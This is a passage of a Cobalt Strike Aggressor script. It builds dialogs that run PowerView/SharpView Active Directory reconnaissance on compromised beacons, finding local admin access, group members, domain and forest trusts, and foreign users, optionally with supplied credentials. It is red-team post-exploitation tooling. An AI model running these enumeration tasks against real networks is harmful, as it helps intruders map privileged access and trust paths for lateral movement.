            helpfindlocaladminaccess()
            break;
        }
        $creds = "";
        foreach $key => $value ($3){
            if ($value ne "" && $value ne "false" && $value ne "true" && $key ne "execmethod" && $key ne "Credential"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
            else if ($value eq "true"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
            }
            else if ($key eq "Credential" && $value ne ""){
                $creds = createcredentialobject($bid, $3["execmethod"], $3["Credential"]);
                if($3["execmethod"] eq "Execute-Assembly"){
                    $value = $creds;
                }
                else if($3["execmethod"] eq "PowerPick" || $3["execmethod"] eq "PowerShell"){
                    $value = "\$Credential";
                }
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
        }
        if($3["execmethod"] eq "PowerPick"){
            btask($bid, 'Executing PowerView Find-LocalAdminAccess via PowerPick');
            bpowerpick($bid, ''.$creds.'Find-LocalAdminAccess'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "PowerShell"){
            btask($bid, 'Executing PowerView Find-LocalAdminAccess via PowerShell');
            bpowershell($bid, ''.$creds.'Find-LocalAdminAccess'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "Execute-Assembly"){
            btask($bid, 'Executing SharpView Find-LocalAdminAccess via Execute-Assembly');
            bexecute_assembly($bid, script_resource($sharviewlocation), 'Find-LocalAdminAccess'.$cmdargs.'');
        }
    }));
    dialog_description($dialog, "Finds machines on the local domain where the current user has local administrator access");
    drow_text($dialog, 'ComputerName', 'ComputerName');
    drow_text($dialog, 'ComputerDomain', 'ComputerDomain');
    drow_text($dialog, 'ComputerLDAPFilter', 'ComputerLDAPFilter');
    drow_text($dialog, 'ComputerSearchBase', 'ComputerSearchBase');
    drow_text($dialog, 'ComputerOperatingSystem', 'ComputerOperatingSystem');
    drow_text($dialog, 'ComputerServicePack', 'ComputerServicePack');
    drow_text($dialog, 'ComputerSiteName', 'ComputerSiteName');
    drow_text($dialog, 'Server', 'Server');
    drow_text($dialog, 'SearchScope', 'SearchScope');
    drow_text($dialog, 'ResultPageSize', 'ResultPageSize');
    drow_text($dialog, 'ServerTimeLimit', 'ServerTimeLimit');
    drow_text($dialog, 'Credential', 'Credential');
    drow_text($dialog, 'Delay', 'Delay');
    drow_text($dialog, 'Jitter', 'Jitter');
    drow_text($dialog, 'Threads', 'Threads');
    drow_checkbox($dialog, 'CheckShareAccess', 'CheckShareAccess');
    drow_checkbox($dialog, 'Tombstone', 'Tombstone');
    drow_combobox($dialog, "execmethod", "Exec Method ", @("PowerPick", "PowerShell", "Execute-Assembly"));
    dbutton_action($dialog, "Run");
    dbutton_action($dialog, "Help");
    dialog_show($dialog);
}

sub finddomainlocalgroupmember{
    $bid = $1;
    $cmdargs = "";
    $dialog = dialog("PowerView 3.0 Find-DomainLocalGroupMember", %(execmethod => "PowerPick", ComputerName => "", ComputerDomain => "", ComputerLDAPFilter => "", ComputerSearchBase => "", ComputerOperatingSystem => "", ComputerServicePack => "", ComputerSiteName => "", GroupName => "", Method => "", Server => "", SearchScope => "", ResultPageSize => "", ServerTimeLimit => "", Tombstone => "false", Credential => "", Delay => "", Jitter => "", Threads => ""), lambda({
        if ($2 eq  'Help'){
            helpfinddomainlocalgroupmember()
            break;
        }
        $creds = "";
        foreach $key => $value ($3){
            if ($value ne "" && $value ne "false" && $value ne "true" && $key ne "execmethod" && $key ne "Credential"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
            else if ($value eq "true"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
            }
            else if ($key eq "Credential" && $value ne ""){
                $creds = createcredentialobject($bid, $3["execmethod"], $3["Credential"]);
                if($3["execmethod"] eq "Execute-Assembly"){
                    $value = $creds;
                }
                else if($3["execmethod"] eq "PowerPick" || $3["execmethod"] eq "PowerShell"){
                    $value = "\$Credential";
                }
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
        }
        if($3["execmethod"] eq "PowerPick"){
            btask($bid, 'Executing PowerView Find-DomainLocalGroupMember via PowerPick');
            bpowerpick($bid, ''.$creds.'Find-DomainLocalGroupMember'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "PowerShell"){
            btask($bid, 'Executing PowerView Find-DomainLocalGroupMember via PowerShell');
            bpowershell($bid, ''.$creds.'Find-DomainLocalGroupMember'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "Execute-Assembly"){
            btask($bid, 'Executing SharpView Find-DomainLocalGroupMember via Execute-Assembly');
            bexecute_assembly($bid, script_resource($sharviewlocation), 'Find-DomainLocalGroupMember'.$cmdargs.'');
        }
    }));
    dialog_description($dialog, "Enumerates the members of specified local group (default administrators) for all the targeted machines on the current (or specified) domain");
    drow_text($dialog, 'ComputerName', 'ComputerName');
    drow_text($dialog, 'ComputerDomain', 'ComputerDomain');
    drow_text($dialog, 'ComputerLDAPFilter', 'ComputerLDAPFilter');
    drow_text($dialog, 'ComputerSearchBase', 'ComputerSearchBase');
    drow_text($dialog, 'ComputerOperatingSystem', 'ComputerOperatingSystem');
    drow_text($dialog, 'ComputerServicePack', 'ComputerServicePack');
    drow_text($dialog, 'ComputerSiteName', 'ComputerSiteName');
    drow_text($dialog, 'GroupName', 'GroupName');
    drow_text($dialog, 'Method', 'Method');
    drow_text($dialog, 'Server', 'Server');
    drow_text($dialog, 'SearchScope', 'SearchScope');
    drow_text($dialog, 'ResultPageSize', 'ResultPageSize');
    drow_text($dialog, 'ServerTimeLimit', 'ServerTimeLimit');
    drow_text($dialog, 'Credential', 'Credential');
    drow_text($dialog, 'Delay', 'Delay');
    drow_text($dialog, 'Jitter', 'Jitter');
    drow_text($dialog, 'Threads', 'Threads');
    drow_checkbox($dialog, 'Tombstone', 'Tombstone');
    drow_combobox($dialog, "execmethod", "Exec Method ", @("PowerPick", "PowerShell", "Execute-Assembly"));
    dbutton_action($dialog, "Run");
    dbutton_action($dialog, "Help");
    dialog_show($dialog);
}

#------------------------
#Domain Trust Functions
#------------------------
sub getdomaintrust{
    $bid = $1;
    $cmdargs = "";
    $dialog = dialog("PowerView 3.0 Get-DomainTrust", %(execmethod => "PowerPick", Domain => "", API => "false", NET => "false", LDAPFilter => "", Properties => "", SearchBase => "", Server => "", SearchScope => "", ResultPageSize => "", ServerTimeLimit => "", Tombstone => "false", FindOne => "false", Credential => ""), lambda({
        if ($2 eq  'Help'){
            helpgetdomaintrust()
            break;
        }
        $creds = "";
        foreach $key => $value ($3){
            if ($value ne "" && $value ne "false" && $value ne "true" && $key ne "execmethod" && $key ne "Credential"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
            else if ($value eq "true"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
            }
            else if ($key eq "Credential" && $value ne ""){
                $creds = createcredentialobject($bid, $3["execmethod"], $3["Credential"]);
                if($3["execmethod"] eq "Execute-Assembly"){
                    $value = $creds;
                }
                else if($3["execmethod"] eq "PowerPick" || $3["execmethod"] eq "PowerShell"){
                    $value = "\$Credential";
                }
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
        }
        if($3["execmethod"] eq "PowerPick"){
            btask($bid, 'Executing PowerView Get-DomainTrust via PowerPick');
            bpowerpick($bid, ''.$creds.'Get-DomainTrust'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "PowerShell"){
            btask($bid, 'Executing PowerView Get-DomainTrust via PowerShell');
            bpowershell($bid, ''.$creds.'Get-DomainTrust'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "Execute-Assembly"){
            btask($bid, 'Executing SharpView Get-DomainTrust via Execute-Assembly');
            bexecute_assembly($bid, script_resource($sharviewlocation), 'Get-DomainTrust'.$cmdargs.'');
        }
    }));
    dialog_description($dialog, "Return all domain trusts for the current domain or a specified domain");
    drow_text($dialog, 'Domain', 'Domain');
    drow_text($dialog, 'LDAPFilter', 'LDAPFilter');
    drow_text($dialog, 'Properties', 'Properties');
    drow_text($dialog, 'SearchBase', 'SearchBase');
    drow_text($dialog, 'Server', 'Server');
    drow_text($dialog, 'SearchScope', 'SearchScope');
    drow_text($dialog, 'ResultPageSize', 'ResultPageSize');
    drow_text($dialog, 'ServerTimeLimit', 'ServerTimeLimit');
    drow_text($dialog, 'Credential', 'Credential');
    drow_checkbox($dialog, 'API', 'API');
    drow_checkbox($dialog, 'NET', 'NET');
    drow_checkbox($dialog, 'Tombstone', 'Tombstone');
    drow_checkbox($dialog, 'FindOne', 'FindOne');
    drow_combobox($dialog, "execmethod", "Exec Method ", @("PowerPick", "PowerShell", "Execute-Assembly"));
    dbutton_action($dialog, "Run");
    dbutton_action($dialog, "Help");
    dialog_show($dialog);
}

sub getforesttrust{
    $bid = $1;
    $cmdargs = "";
    $dialog = dialog("PowerView 3.0 Get-ForestTrust", %(execmethod => "PowerPick", Forest => "", Credential => ""), lambda({
        if ($2 eq  'Help'){
            helpgetforesttrust()
            break;
        }
        $creds = "";
        foreach $key => $value ($3){
            if ($value ne "" && $value ne "false" && $value ne "true" && $key ne "execmethod" && $key ne "Credential"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
            else if ($value eq "true"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
            }
            else if ($key eq "Credential" && $value ne ""){
                $creds = createcredentialobject($bid, $3["execmethod"], $3["Credential"]);
                if($3["execmethod"] eq "Execute-Assembly"){
                    $value = $creds;
                }
                else if($3["execmethod"] eq "PowerPick" || $3["execmethod"] eq "PowerShell"){
                    $value = "\$Credential";
                }
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
        }
        if($3["execmethod"] eq "PowerPick"){
            btask($bid, 'Executing PowerView Get-ForestTrust via PowerPick');
            bpowerpick($bid, ''.$creds.'Get-ForestTrust'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "PowerShell"){
            btask($bid, 'Executing PowerView Get-ForestTrust via PowerShell');
            bpowershell($bid, ''.$creds.'Get-ForestTrust'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "Execute-Assembly"){
            btask($bid, 'Executing SharpView Get-ForestTrust via Execute-Assembly');
            bexecute_assembly($bid, script_resource($sharviewlocation), 'Get-ForestTrust'.$cmdargs.'');
        }
    }));
    dialog_description($dialog, "Return all forest trusts for the current forest or a specified forest");
    drow_text($dialog, 'Forest', 'Forest');
    drow_text($dialog, 'Credential', 'Credential');
    drow_combobox($dialog, "execmethod", "Exec Method ", @("PowerPick", "PowerShell", "Execute-Assembly"));
    dbutton_action($dialog, "Run");
    dbutton_action($dialog, "Help");
    dialog_show($dialog);
}

sub getdomainforeignuser{
    $bid = $1;
    $cmdargs = "";
    $dialog = dialog("PowerView 3.0 Get-DomainForeignUser", %(execmethod => "PowerPick", Domain => "", LDAPFilter => "", Properties => "", SearchBase => "", Server => "", SearchScope => "", ResultPageSize => "", ServerTimeLimit => "", SecurityMasks => "", Tombstone => "false", Credential => ""), lambda({
        if ($2 eq  'Help'){
            helpgetdomainforeignuser()
            break;
        }
        $creds = "";
        foreach $key => $value ($3){
            if ($value ne "" && $value ne "false" && $value ne "true" && $key ne "execmethod" && $key ne "Credential"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
            else if ($value eq "true"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
            }
            else if ($key eq "Credential" && $value ne ""){
                $creds = createcredentialobject($bid, $3["execmethod"], $3["Credential"]);
                if($3["execmethod"] eq "Execute-Assembly"){
                    $value = $creds;
                }
                else if($3["execmethod"] eq "PowerPick" || $3["execmethod"] eq "PowerShell"){
                    $value = "\$Credential";
                }
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
        }
        if($3["execmethod"] eq "PowerPick"){
            btask($bid, 'Executing PowerView Get-DomainForeignUser via PowerPick');
            bpowerpick($bid, ''.$creds.'Get-DomainForeignUser'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "PowerShell"){
            btask($bid, 'Executing PowerView Get-DomainForeignUser via PowerShell');
            bpowershell($bid, ''.$creds.'Get-DomainForeignUser'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "Execute-Assembly"){
            btask($bid, 'Executing SharpView Get-DomainForeignUser via Execute-Assembly');
            bexecute_assembly($bid, script_resource($sharviewlocation), 'Get-DomainForeignUser'.$cmdargs.'');
        }
    }));
    dialog_description($dialog, "Enumerates users who are in groups outside of the user's domain. This is a domain's 'outgoing' access");
    drow_text($dialog, 'Domain', 'Domain');
    drow_text($dialog, 'LDAPFilter', 'LDAPFilter');
    drow_text($dialog, 'Properties', 'Properties');
    drow_text($dialog, 'SearchBase', 'SearchBase');
    drow_text($dialog, 'Server', 'Server');
    drow_text($dialog, 'SearchScope', 'SearchScope');
    drow_text($dialog, 'ResultPageSize', 'ResultPageSize');
    drow_text($dialog, 'ServerTimeLimit', 'ServerTimeLimit');
    drow_text($dialog, 'SecurityMasks', 'SecurityMasks');
    drow_text($dialog, 'Credential', 'Credential');
    drow_checkbox($dialog, 'Tombstone', 'Tombstone');
    drow_combobox($dialog, "execmethod", "Exec Method ", @("PowerPick", "PowerShell", "Execute-Assembly"));
    dbutton_action($dialog, "Run");
    dbutton_action($dialog, "Help");
    dialog_show($dialog);
}

sub getdomainforeigngroupmember{
    $bid = $1;
    $cmdargs = "";
    $dialog = dialog("PowerView 3.0 Get-DomainForeignGroupMember", %(execmethod => "PowerPick", Domain => "", LDAPFilter => "", Properties => "", SearchBase => "", Server => "", SearchScope => "", ResultPageSize => "", ServerTimeLimit => "", SecurityMasks => "", Tombstone => "false", Credential => ""), lambda({
        if ($2 eq  'Help'){
            helpgetdomainforeigngroupmember()
            break;
        }
        $creds = "";
        foreach $key => $value ($3){
            if ($value ne "" && $value ne "false" && $value ne "true" && $key ne "execmethod" && $key ne "Credential"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
            else if ($value eq "true"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
            }
            else if ($key eq "Credential" && $value ne ""){
                $creds = createcredentialobject($bid, $3["execmethod"], $3["Credential"]);
                if($3["execmethod"] eq "Execute-Assembly"){
                    $value = $creds;
                }
                else if($3["execmethod"] eq "PowerPick" || $3["execmethod"] eq "PowerShell"){
                    $value = "\$Credential";
                }
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
        }
        if($3["execmethod"] eq "PowerPick"){
            btask($bid, 'Executing PowerView Get-DomainForeignGroupMember via PowerPick');
            bpowerpick($bid, ''.$creds.'Get-DomainForeignGroupMember'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "PowerShell"){
            btask($bid, 'Executing PowerView Get-DomainForeignGroupMember via PowerShell');
            bpowershell($bid, ''.$creds.'Get-DomainForeignGroupMember'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "Execute-Assembly"){
            btask($bid, 'Executing SharpView Get-DomainForeignGroupMember via Execute-Assembly');
            bexecute_assembly($bid, script_resource($sharviewlocation), 'Get-DomainForeignGroupMember'.$cmdargs.'');
        }
    }));
    dialog_description($dialog, "Enumerates groups with users outside of the group's domain and returns each foreign member. This is a domain's 'incoming' access");
    drow_text($dialog, 'Domain', 'Domain');
    drow_text($dialog, 'LDAPFilter', 'LDAPFilter');
    drow_text($dialog, 'Properties', 'Properties');
    drow_text($dialog, 'SearchBase', 'SearchBase');
    drow_text($dialog, 'Server', 'Server');
    drow_text($dialog, 'SearchScope', 'SearchScope');
    drow_text($dialog, 'ResultPageSize', 'ResultPageSize');
    drow_text($dialog, 'ServerTimeLimit', 'ServerTimeLimit');
    drow_text($dialog, 'SecurityMasks', 'SecurityMasks');
    drow_text($dialog, 'Credential', 'Credential');
    drow_checkbox($dialog, 'Tombstone', 'Tombstone');
    drow_combobox($dialog, "execmethod", "Exec Method ", @("PowerPick", "PowerShell", "Execute-Assembly"));
    dbutton_action($dialog, "Run");
    dbutton_action($dialog, "Help");
    dialog_show($dialog);
}
sub getdomaintrustmapping{
    $bid = $1;
    $cmdargs = "";
    $dialog = dialog("PowerView 3.0 Get-DomainTrustMapping", %(execmethod => "PowerPick", API => "false", NET => "false", LDAPFilter => "", Properties => "", SearchBase => "", Server => "", SearchScope => "", ResultPageSize => "", ServerTimeLimit => "", Tombstone => "false", Credential => ""), lambda({
        if ($2 eq  'Help'){
            helpgetdomaintrustmapping()
            break;
        }
        $creds = "";
        foreach $key => $value ($3){
            if ($value ne "" && $value ne "false" && $value ne "true" && $key ne "execmethod" && $key ne "Credential"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
            else if ($value eq "true"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
            }
            else if ($key eq "Credential" && $value ne ""){
                $creds = createcredentialobject($bid, $3["execmethod"], $3["Credential"]);
                if($3["execmethod"] eq "Execute-Assembly"){
                    $value = $creds;
                }
                else if($3["execmethod"] eq "PowerPick" || $3["execmethod"] eq "PowerShell"){
                    $value = "\$Credential";
                }
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
        }
        if($3["execmethod"] eq "PowerPick"){
            btask($bid, 'Executing PowerView Get-DomainTrustMapping via PowerPick');
            bpowerpick($bid, ''.$creds.'Get-DomainTrustMapping'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "PowerShell"){
            btask($bid, 'Executing PowerView Get-DomainTrustMapping via PowerShell');
            bpowershell($bid, ''.$creds.'Get-DomainTrustMapping'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "Execute-Assembly"){
            btask($bid, 'Executing SharpView Get-DomainTrustMapping via Execute-Assembly');
            bexecute_assembly($bid, script_resource($sharviewlocation), 'Get-DomainTrustMapping'.$cmdargs.'');
        }
    }));
    dialog_description($dialog, "This function enumerates all trusts for the current domain and then enumerates all trusts for each domain it finds");
    drow_text($dialog, 'LDAPFilter', 'LDAPFilter');
    drow_text($dialog, 'Properties', 'Properties');
    drow_text($dialog, 'SearchBase', 'SearchBase');
    drow_text($dialog, 'Server', 'Server');
    drow_text($dialog, 'SearchScope', 'SearchScope');
    drow_text($dialog, 'ResultPageSize', 'ResultPageSize');
    drow_text($dialog, 'ServerTimeLimit', 'ServerTimeLimit');
    drow_text($dialog, 'Credential', 'Credential');
    drow_checkbox($dialog, 'API', 'API');
    drow_checkbox($dialog, 'NET', 'NET');
    drow_checkbox($dialog, 'Tombstone', 'Tombstone');
    drow_combobox($dialog, "execmethod", "Exec Method ", @("PowerPick", "PowerShell", "Execute-Assembly"));
    dbutton_action($dialog, "Run");
    dbutton_action($dialog, "Help");
    dialog_show($dialog);
}